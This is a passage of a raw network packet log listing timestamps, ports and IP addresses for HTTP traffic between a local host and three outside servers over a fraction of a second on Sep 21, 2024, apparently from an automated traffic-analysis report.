Sep 21, 2024 14:48:09.752125978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752136946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752147913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752159119 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752170086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752171993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752183914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752193928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752202988 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752207041 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752237082 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752262115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752840996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752851963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752861977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752876043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752886057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752897978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752907038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752914906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752927065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752937078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752947092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752947092 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752960920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752971888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752984047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.752986908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752995014 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.752995968 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753007889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753017902 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753025055 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753036976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753047943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753053904 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753060102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753073931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753094912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753149033 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753745079 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753757000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753767014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753777027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753787994 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753798962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753808022 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753808022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753823996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753834009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753844976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753849983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753858089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.753878117 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.753906012 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754081964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754125118 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754308939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754319906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754329920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754339933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754352093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754362106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754369020 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754373074 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754384995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754395008 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754405975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754411936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754416943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754429102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754437923 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754451036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754455090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754462957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754481077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754492044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754496098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754503965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754514933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.754530907 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754549026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.754573107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.755240917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755253077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755261898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755274057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755285978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755296946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755297899 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.755309105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755320072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755330086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755345106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.755348921 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.755357027 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755369902 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755379915 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755398035 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755399942 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.755419970 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755450010 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755733967 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755743980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755757093 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755768061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755781889 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755824089 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755882978 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755893946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755904913 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755914927 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755924940 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755937099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.755938053 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755965948 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.755991936 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756059885 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756109953 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756114960 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756128073 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756161928 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756182909 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756196022 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756205082 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756230116 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756314039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.756853104 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756907940 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756920099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756982088 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.756995916 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757038116 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.757080078 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.757723093 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757742882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757761002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757770061 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.757812023 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.757853031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757865906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.757899046 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.758589029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.758641005 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.758652925 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.758670092 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.758692026 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.758711100 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.758734941 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.758744001 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.758784056 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.759423971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.759464979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.759475946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.759495974 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.759546041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.759569883 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.759582043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.759617090 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.759653091 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.760262966 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.760310888 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.760323048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.760324001 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.760358095 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.760375977 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.760389090 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.760401011 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.760437012 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.763048887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.763058901 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.763161898 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.792618990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.792644024 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.792840958 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.792989016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793061972 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793073893 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793075085 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793118954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793150902 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793163061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793203115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793247938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793257952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793271065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793294907 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793296099 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793307066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793327093 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793364048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793390989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793437004 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793451071 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793462992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793476105 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793509007 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793530941 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793592930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793605089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793616056 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793641090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793664932 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793732882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793745995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.793761015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793771982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793785095 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.793832064 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.793929100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793941021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793956995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793968916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793978930 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.793986082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.793989897 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794017076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.794035912 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.794181108 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794193029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794203043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794214964 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794226885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794238091 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.794270992 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.794341087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794353008 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794363976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794375896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.794384956 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.794434071 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.794549942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794569016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794579983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794591904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794604063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794610977 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.794615030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794641018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.794678926 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.794801950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794814110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794823885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794833899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794847965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.794848919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795027971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795039892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795042992 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795051098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795068979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795089006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795110941 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795258999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795269966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795280933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795290947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795300961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795312881 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795315981 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.795325041 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795336008 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795345068 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.795348883 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795362949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795377016 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.795407057 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.795598984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795609951 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.795648098 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.795649052 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795694113 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795780897 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795792103 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795802116 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795814037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795825005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795834064 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795835972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795847893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795860052 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.795881987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.795909882 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.796096087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796107054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796118975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796159029 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796179056 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796204090 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796216011 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796226025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796236992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796247959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796258926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796269894 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796281099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796294928 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.796314001 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796345949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796345949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796369076 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.796794891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796807051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796818018 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796830893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796837091 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796847105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796858072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796860933 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.796868086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796879053 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796895027 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.796901941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796911955 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796930075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796941042 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.796955109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796966076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796972990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.796977043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796989918 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.796994925 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.797034979 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.797543049 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797554016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797575951 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797586918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797596931 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797600985 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.797606945 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797619104 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797630072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797640085 CEST	80	49713	176.113.115.33	192.168.2.9
